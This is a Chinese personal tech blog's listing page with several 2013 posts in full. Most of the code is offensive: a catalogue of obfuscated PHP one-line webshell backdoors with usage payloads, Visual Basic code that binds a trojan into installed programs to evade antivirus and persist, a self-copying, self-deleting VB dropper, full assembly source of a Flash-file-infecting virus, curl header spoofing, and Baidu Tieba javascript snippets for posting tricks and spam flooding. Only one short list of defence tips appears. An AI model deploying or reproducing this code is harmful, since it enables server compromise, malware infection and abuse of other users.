首页
闲言碎语
个人导航
文章归档
友情链接
留言簿
关于
更多
网络电视
云盘
统计
推荐
付费资源
朋友圈集赞
二维码生成
音乐下载
Search
1
全网首发-小米AX6000路由器解锁ssh并固化ssh+2.5G有线mesh组网+公网访问路由后台+红米AX6/小米AX6/AX3600/AX6000/AX9000全系列适用
6,830 阅读
2
青龙面板必装依赖及青龙各种问题解决
3,934 阅读
3
NAS一键批量清除重复文件
3,544 阅读
4
群辉DSM7.0.1安装bootstrap后解决wget: error while loading shared libraries: libgnuintl.so.8: cannot open shared object file: No such file or directory
1,606 阅读
5
《爱情公寓4》全集高清迅雷下载
903 阅读
闲言碎语
学习
福利
技术百科
WordPress
Typecho
软件资源
iPhone
Android
PC软件
CODE
C
VB
PHP
NAS
青龙
登录
Search
标签搜索
wordpress
News
iphone
vb
iOS
technology
渗透
QQ
php
talk
JavaScript
hack
Typecho
NAS
福利
c++
diy
c
免杀
评测
Jonty
累计撰写
275
篇文章
累计收到
980
条评论
今日撰写
0
篇文章
首页
栏目
闲言碎语
学习
福利
技术百科
WordPress
Typecho
软件资源
iPhone
Android
PC软件
CODE
C
VB
PHP
NAS
青龙
页面
闲言碎语
个人导航
文章归档
友情链接
留言簿
关于
网络电视
云盘
统计
推荐
付费资源
朋友圈集赞
二维码生成
音乐下载
用户登录
登录
搜索到
35
篇与
的结果
2013-08-04
JS判断是手机访问网站还是电脑访问网站
代码如下:<script type="text/javascript" language="javascript">// <![CDATA[ (function(){ var res = GetRequest(); var par = res['index']; if(par!='gfan'){ var ua=navigator.userAgent.toLowerCase(); var contains=function (a, b){ if(a.indexOf(b)!=-1){return true;} }; //将下面的http://wap.nobb.cc/改成你的wap手机版地址 var toMobileVertion = function(){ window.location.href = 'http://wap.nobb.cc/' } if(contains(ua,"ipad")||(contains(ua,"rv:1.2.3.4"))||(contains(ua,"0.0.0.0"))||(contains(ua,"8.0.552.237"))){return false} if((contains(ua,"android") && contains(ua,"mobile"))||(contains(ua,"android") && contains(ua,"mozilla")) ||(contains(ua,"android") && contains(ua,"opera")) ||contains(ua,"ucweb7")||contains(ua,"iphone")){toMobileVertion();} } })(); function GetRequest() { var url = location.search; //获取url中"?"符后的字串 var theRequest = new Object(); if (url.indexOf("?") != -1) { var str = url.substr(1); strs = str.split("&"); for(var i = 0; i < strs.length; i ++) { theRequest[strs.split("=")[0]]=unescape(strs.split("=")[1]); } } return theRequest; } // ]]></script>手机测试了下还不错。
2013年08月04日
95 阅读
0 评论
0 点赞
2013-08-02
那些强悍的PHP一句话后门
强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN" > <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <?php @preg_replace( "/[pageerror]/e" , $_POST [ 'error' ], "saft" ); header( 'HTTP/1.1 404 Not Found' ); ?>404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。无特征隐藏PHP一句话:<?php session_start(); $_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); $_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' ); ?>将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。超级隐蔽的PHP后门:<?php $_GET[a]($_GET[b]);?>仅用GET函数就构成了木马;利用方法:?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。层级请求,编码运行PHP后门:此方法用两个文件实现,文件1<?php //1.php header('Content-type:text/html;charset=utf-8'); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10' && count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6))))); }文件2<?php //2.php header('Content-type:text/html;charset=utf-8'); //要执行的代码 $code = <<<CODE phpinfo(); CODE; //进行base64编码 $code = base64_encode($code); //构造referer字符串 $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i="; //后门url $url = 'http://localhost/test1/1.php'; $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echo curl_exec($ch);通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。PHP后门生成工具weevelyweevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。三个变形的一句话PHP木马第一个<?php ($_=@$_GET[2]).@$_($_POST[1])?>在菜刀里写http://site/1.php?2=assert密码是1第二个<?php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。第三个( $b4dboy = $_POST [ 'b4dboy' ]) && @preg_replace( '/ad/e' , '@' . str_rot13 ( 'riny' ). '($b4dboy)' , 'add' );str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!最后列几个高级的PHP一句话木马后门:1、 $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 2、 $filename=$_GET['xbid']; include ($filename); //危险的include函数,直接编译任何文件为php格式运行 3、 $reg="c"."o"."p"."y"; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); //重命名任何文件 4、 $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $gzid("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 5、include ($uid); //危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif //gif插一句话 6、典型一句话 程序后门代码 <?php eval_r($_POST[sb])?> 程序代码 <?php @eval_r($_POST[sb])?> //容错代码 程序代码 <?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句 程序代码 <?$_POST['sa']($_POST['sb']);?> 程序代码 <?$_POST['sa']($_POST['sb'],$_POST['sc'])?> 程序代码 <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?> //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 程序代码 <O>h=@eval_r($_POST1);</O> 程序代码 <script language="php">@eval_r($_POST[sb])</script> //绕过<?限制的一句话综上,这些PHP一句话后门可谓五脏俱全,一不小心您肯定中招了,而我们今天这篇文章的重中之重在哪呢?重点就在下边的总结!如何应对PHP一句话后门:我们强调几个关键点,看这文章的你相信不是门外汉,我也就不啰嗦了:1,对PHP程序编写要有安全意识 2,服务器日志文件要经常看,经常备份 3,对每个站点进行严格的权限分配 4,对动态文件及目录经常批量安全审查 5,学会如何进行手工杀毒《即行为判断查杀》 6,时刻关注,或渗入活跃的网络安全营地 7,对服务器环境层级化处理,哪怕一个函数也可做规则
2013年08月02日
89 阅读
4 评论
0 点赞
2013-07-21
VB判断程序自身是否被修改(防脱壳)
以前写的,用了2个判别办法。1.检测自身文件大小 2.检测CRC32(当然也可以检测md5)补充几句:最简单的就是加个变态壳。。不然遇到高手这也是浮云。。先上图。代码如下:
2013年07月21日
96 阅读
0 评论
0 点赞
2013-07-14
VB之远控免杀之破杀软自启动
以前买了本书《终极免杀》,书还不错,主要是看中了360免杀的专题。里面就讲了这个方法来自启动。思路如下:查找系统指定软件路径(用注册表),然后把木马与主程序捆绑并替换。有些程序会自身检测。这个就要靠你自己了。源码中的资源文件放木马,源码感染的是迅雷,当然你可以改成别的!核心模块代码;Function GanRanExe(ByVal sFilePath As String) Dim MyArray() As Byte Dim CurrentSize As Long Dim FileArray() As Byte, FileArray1() As Byte Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 ReDim MyArray(LOF(1) - 1) Get #1, , MyArray Close #1 Open sFilePath For Binary Access Read As #1 ReDim FileArray(LOF(1) - 1) Get #1, , FileArray Close #1 FileArray1 = LoadResData(101, "CUSTOM") Kill sFilePath Open sFilePath For Binary Access Write As #1 Put #1, , MyArray Put #1, , FileArray CurrentSize = LOF(1) Put #1, , FileArray1 Put #1, , "GanRanFileTbide" & UBound(MyArray) + 1 & "," & UBound(FileArray) + 1 & "," & CurrentSize & "," & UBound(FileArray1) + 1 Close #1 End Function Function FenLiGanRanExe(ByVal FenLiToFilePath As String) On Error Resume Next Dim MyArray() As Byte Dim FileArray() As Byte Dim FenLiXinXi() As String Dim FenLiXinXiSize() As String Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 ReDim MyArray(LOF(1) - 1) Get #1, , MyArray FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide") FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",") ReDim FileArray(FenLiXinXiSize(1) - 1) Get #1, FenLiXinXiSize(0) + 1, FileArray Close #1 Kill FenLiToFilePath Open FenLiToFilePath For Binary Access Write As #1 Put #1, 1, FileArray Close #1 End Function Function FenLiGanRanExe1(ByVal FenLiToFilePath As String) On Error Resume Next Dim MyArray() As Byte Dim FileArray() As Byte Dim FenLiXinXi() As String Dim FenLiXinXiSize() As String Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 ReDim MyArray(LOF(1) - 1) Get #1, , MyArray FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide") FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",") ReDim FileArray(FenLiXinXiSize(3) - 1) Get #1, FenLiXinXiSize(2) + 1, FileArray Close #1 Kill FenLiToFilePath Open FenLiToFilePath For Binary Access Write As #1 Put #1, 1, FileArray Close #1 End Function Function TestGanRan(ByVal sFilePath As String) As Boolean Dim FileArray() As Byte Open sFilePath For Binary Access Read As #1 ReDim FileArray(LOF(1) - 1) Get #1, , FileArray Close #1 If InStr(StrConv(FileArray, vbUnicode), "GanRanFileTbide") > 0 Then TestGanRan = True Else TestGanRan = False End If End Function Public Function ReadReg(ByVal hKey) On Error Resume Next Set pReg = CreateObject("Wscript.Shell") ReadReg = pReg.RegRead(hKey) End Function Function PanDuanpath() As Boolean On Error Resume Next Dim thunderPath thunderPath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Thunder Network\ThunderOem\thunder_backwnd\dir") If Dir(thunderPath & "\Program\Thunder.exe") <> "" Then FrmMain.Combo1.AddItem thunderPath FrmMain.Combo1.Text = thunderPath Else End If Dim Qvodpath Qvodpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\QvodPlayer\Insert\Insertpath") If Dir(Qvodpath & "/QvodPlayer.exe") <> "" Then FrmMain.Combo1.AddItem Qvodpath FrmMain.Combo1.Text = Qvodpath Else End If Dim PPSpath PPSpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PPStream.exe\Path") If Dir(PPSpath & "/PPStream.exe") <> "" Then FrmMain.Combo1.AddItem PPSpath FrmMain.Combo1.Text = PPSpath Else End If End Function{anote icon="fa-download" href="http://pan.baidu.com/share/link?shareid=603098846&uk=1547026424" type="success" content="源码下载地址"/}
2013年07月14日
124 阅读
0 评论
0 点赞
2013-07-14
VB自删除+复制到系统目录
以前无聊写的声明文件复制到C盘属于敏感操作360绝对会提示或许可以先重命名为一个图片,再复制,再改后缀代码如下:Private Sub Form_Load() If Right(App.Path, 1) = "\" Then Path = App.Path ElseIf Right(App.Path, 1) <> "\" Then Path = App.Path + "\" End If If LCase(Path & App.EXEName & ".exe") <> LCase(Environ("windir") & "\system32\Jonty.exe") Then 'MsgBox Path & App.EXEName & ".exe" + vbCrLf + Environ("windir") & "\system32\Jonty.exe" FileCopy Path & App.EXEName & ".exe", Environ("windir") & "\system32\Jonty.exe" 'Shell Environ("windir") & "\system32\Jonty.exe", vbHide Call killmyself Shell Path & "killmyself.bat", vbHide End Else MsgBox "这里执行你要运行的文件" Call killmyself End End If End Sub Sub killmyself() Open App.Path & "\killmyself.bat" For Output As #1 '"@echo off" 不显示执行过程 Print #1, "@echo off" Print #1, "sleep 500" 'a.bat 删除指定文件 Print #1, "del " & App.EXEName + ".exe" 'a.bat 删除自身 Print #1, "del killmyself.bat" Print #1, "cls" Print #1, "exit" Close #1 End Sub
2013年07月14日
83 阅读
0 评论
0 点赞
2013-07-14
VB代码高亮记事本
网上收集的一款很不错的源码,速度很快!
2013年07月14日
92 阅读
0 评论
0 点赞
2013-05-27
用vb写的比sobig更毒的蠕虫病毒!!!
代码如下:
2013年05月27日
77 阅读
0 评论
0 点赞
2013-05-08
PHP利用curl伪造IP和来路
伪造的文件:1.php<? php$ch = curl_init (); curl_setopt ( $ch , CURLOPT_URL , "http://localhost/2.php" ); curl_setopt ( $ch , CURLOPT_HTTPHEADER , array ( 'X-FORWARDED-FOR:8.8.8.8' , 'CLIENT-IP:8.8.8.8' )); //构造IP curl_setopt ( $ch , CURLOPT_REFERER , "http://www.xssxss.com/" ); //构造来路 curl_setopt ( $ch , CURLOPT_HEADER , 1 ); $out = curl_exec ( $ch ); curl_close ( $ch ); ?>效果脚本2.php<? php function getClientIp () { if (! empty ( $_SERVER [ "HTTP_CLIENT_IP" ])) $ip = $_SERVER [ "HTTP_CLIENT_IP" ]; else if (! empty ( $_SERVER [ "HTTP_X_FORWARDED_FOR" ])) $ip = $_SERVER [ "HTTP_X_FORWARDED_FOR" ]; else if (! empty ( $_SERVER [ "REMOTE_ADDR" ])) $ip = $_SERVER [ "REMOTE_ADDR" ]; else $ip = "err" ; return $ip ; } echo "IP: " . getClientIp () . "" ; echo "referer: " . $_SERVER [ "HTTP_REFERER" ]; ?>
2013年05月08日
154 阅读
0 评论
0 点赞
2013-03-01
第一只感染flash的病毒源代码
代码如下:SWF/LFM-926 Virus: ; ------------------ ; Description: WinNT/XP Virus dropper for Flash .SWF files! ; Masm Version 6.11: ML.EXE SWF.ASM ; Virus Size: 926 bytes ; Infection Size: 3247 bytes. ; Last Edit: 01/08/2002 ; --------------------------------- Begin Source Code ------------------------------------ .286 .model tiny .code org 100h Entry: jmp Start VIR_SIZE equ Virus_End-Entry DTA db 128 dup(0) ; Offset DTA+30 = filename HANDLE dw ? ; Handle to host file PTR1 dd 0 ; Segment address of the created memory block PATH db "*.SWF",0 ; File mask BINARY db "v.com",0 ; Binary code HEX db "0123456789ABCDEF" ; Binary to hex ; Flash header block. ; ------------------- SIGN_FW dw ? ; SWF file format SIGN_S db ? VERSION_NUM db ? FILE_LENGTH dw ? dw ? STATIC_HDR_SIZE equ $-SIGN_FW RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;( RECT_BUF_SIZE equ $-RECT_BUF HDR_SIZE dw ? ; Holds the true header size! ; Start of Viral Frame 0. ; ----------------------- Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG] dw 0 db 083h ; ActionGetUrl Tag ACTION_LENGTH dw 0 ; (Drop_BEGIN_SIZE-9)+(SUM OF Drop_MIDDLE)+(Drop_END_SIZE) db FSCommand:exec db 000h db cmd.exe db 009h ; chr(9) is Flash code for a space character. db /c db 009h db echo db 009h db Loading.Flash.Movie... db & db (echo db 009h db n db 009h db v.com&echo db 009h db a db 009h db 100& Drop_BEGIN_SIZE equ $-Drop_BEGIN Drop_MIDDLE db echo db 009h db db db 009h db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes. db & Drop_MIDDLE_SIZE equ $-Drop_MIDDLE Drop_END db &echo.&echo db 009h db rcx&echo db 009h db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes. db &echo db 009h db w&echo db 009h db q)|debug.exe>nul&start db 009h db /b db 009h db v.com db 000h ; StringEnd Tag Drop_END_SIZE equ $-Drop_END ; End of Viral Frame 0. ; --------------------- END_TAG db 001h ; Action code 0x01 = tagshowframe Tag Start: mov ax,(VIR_SIZE+0fh) shr ax,4 shl ax,1 mov bx,ax ; Allocate (VirusSize*2) mov ah,4ah int 21h ; Resize block jc ExProg mov dx,offset DTA ; Set DTA operation mov ah,1ah int 21h mov cx,07h mov dx,offset PATH mov ah,4eh ; FindFirst int 21h jc ExProg jmp Infect Cycle: mov dx,offset PATH mov ah,4fh ; FindNext int 21h jc ExProg jmp Infect ExProg: mov ax,4301h ; Hide v.com mov cx,02h mov dx,offset BINARY int 21h mov ax,4c00h ; End program int 21h Infect: mov byte ptr DTA[30+12],$ mov dx,offset (DTA+30) mov ax,3d02h ; Open host file int 21h jc ExProg mov [HANDLE],ax ; Save file handle mov ax,3f00h ; Read file Header mov dx,offset SIGN_FW mov bx,[HANDLE] mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE) int 21h jc ExProg cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file. jne Cycle ; Try another file ... cmp byte ptr SIGN_S,S jne Cycle cmp byte ptr VERSION_NUM,099h ; Already infected? je Cycle mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag. xor di,di ; Seems to always exist directly after the header. next: cmp byte ptr RECT_BUF[di],043h jne not_found cmp byte ptr RECT_BUF[di+1],002h jne not_found jmp found not_found: inc di loop next jmp Cycle found: mov word ptr HDR_SIZE,STATIC_HDR_SIZE add word ptr HDR_SIZE,di ; Compute the header size mov ax,4200h ; Reset file ptr right after Flash header xor cx,cx mov dx,[HDR_SIZE] int 21h jc ExProg push bx mov ax,word ptr FILE_LENGTH add ax,15 shr ax,4 mov bx,ax mov ah,48h ; Allocate memory for target host file int 21h pop bx jc ExProg mov word ptr PTR1[2],ax ; Save pointer to allocated block mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ah,3fh ; Read host file into memory block push ds lds dx,[PTR1] int 21h pop ds jc ExProg mov ax,4200h ; Reset file ptr to the middle code section xor cx,cx mov dx,[HDR_SIZE] add dx,Drop_BEGIN_SIZE int 21h jc ExProg ; ; The following code is a key technique. It simply converts the ; virus from binary to hex characters and then inserts them into the host ; using a standard format that DEBUG.EXE expects! Flash only really ; allows plain text, so this satisfies that condition. ; mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE) push bx mov cx,VIR_SIZE xor si,si xor di,di ToHex: mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber mov al,byte ptr Entry[si] mov ah,al and al,00001111y xlat mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al shr ax,12 xlat mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al inc si inc di inc di inc di mov ax,si mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line. div bl or ah,ah jnz cont push cx xor di,di add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE mov bx,[HANDLE] ; Write hex dump entry XX,...,XX mov dx,offset Drop_MIDDLE mov cx,Drop_MIDDLE_SIZE mov ax,4000h int 21h jc ExProg pop cx cont: loop ToHex pop bx or di,di jz no_remainder mov dx,offset Drop_MIDDLE mov cx,di add cx,7 ; STATIC_HDR_SIZE-1 add word ptr ACTION_LENGTH,cx mov ax,4000h ; Write remainder hex dump entry XX,...,XX int 21h jc ExProg no_remainder: mov dx,offset Drop_END mov cx,Drop_END_SIZE+1 mov ax,4000h ; Write end code and end of frame tag(01) into host int 21h jc ExProg mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ax,4000h ; Write host code directly after viral code. push ds lds dx,[PTR1] int 21h pop ds jc ExProg ; Patch the header with new viral values. mov cx,word ptr ACTION_LENGTH add cx,4 mov word ptr TAG_LENGTH,cx add cx,6 add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6) ; Set infection marker mov byte ptr VERSION_NUM,099h mov di,[HDR_SIZE] inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1 mov ax,4200h ; Re-wind to start of file xor cx,cx xor dx,dx int 21h jc ExProg mov dx,offset SIGN_FW mov cx,[HDR_SIZE] mov ax,4000h ; Write updated viral header int 21h jc ExProg mov dx,offset Drop_BEGIN mov cx,Drop_BEGIN_SIZE mov ax,4000h ; Write begin code into host int 21h jc ExProg mov ah,49h ; Free memory block mov es,word ptr PTR1[2] int 21h jc ExProg mov ax,3e00h ; Close file int 21h jc ExProg jmp Cycle ; DONE! Try to infect another. Virus_End: end Entry
2013年03月01日
98 阅读
0 评论
0 点赞
2013-02-27
百度贴吧装x回帖方法
先把要回复的图片文字写好,验证码填好。复制的时候头两个字母“ja”不要复制,然后把剩下的复制到地址栏,最后再在最前面手动打上“ja”两个字母,再回车就OK了!长尾巴:javascript:var%20b=rich_postor._editor.getHtml();c=rich_postor._getData();c.content='<spanclass="apc_src_wrapper"><span%20class="apc_src_wrapper"><spanclass="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper"><span%20class="apc_src_wrapper">'+b+'<img%20pic_type="3"%20class="bde_image"%20src="http: imgsrc.baidu.com="" forum="" pic="" item="" 6f657e2eb9389b50e1daf96e8435e5dde7116e1d.jpg"%20height="1" %20width="1">';PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});void%200 贴吧蓝字(可能会被和谐):javascript: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[2-9ce-hj-m]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2 3=prompt(\'输入要回复的蓝字\');2 4="";9(2 i=0;i<3.c;i++){g(3.7(i)<128){4+=3.charAt(i)}else{2 5=3.7(i);g((5&0xFC00)==h)5=(5-h)*1024+3.7(i+1)-0xDC00+0x10000,i++;{4+="&#"+5+";"}}}3=4.8(/<\\/?a[^>]*>/j,"").8(/&/j,"&");2 6=new Array();2 i=0;while(/<[^>]*>|&k;|@\\S*/.test(3)){6[i]=/<[^>]*>|&k;|@\\S*/.exec(3);3=3.8(6[i],"㊣");i++}4="";9(2 i=0;i<3.c;i++){4+="&#"+3.7(i)+";"}9(2 i=0;i<6.c;i++){2 l=6[i]+"";4=4.8(/㊣/,l)}2 e=f._getData();2 a=\'<a style="color: red;" href="http://\';2 b=\'/" target="_blank">\';2 d="< /a>";e.content=a+4+b+4+d;PostHandler.post(f._option.url,e,m(I){unsafeWindow.f.showAddResult(I)},m(I){});',[],23,'||var|str|out|uc|temps|charCodeAt|replace|for|||length||tieba|rich_postor|if|0xD800||gi|nbsp|temp|function'.split('|'),0,{})) 贴吧防和谐:javascript:a=function(text){var result="";for(var i=0;i<text.length;i++){result+='&#'+text.charcodeat(i)+';'};return result};var="" c="rich_postor._getData();c.content=a('请输入帖子内容');" posthandler.post(rich_postor._option.url,c,function(i){rich_postor.showaddresult(i)},function(i){});<br=""> 贴吧刷屏:javascript:var c=rich_postor._getData();c.content='请输入帖子内容';for(var i=1;i<=12;i++){PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});};void 0
2013年02月27日
71 阅读
0 评论
0 点赞
1
2
3
4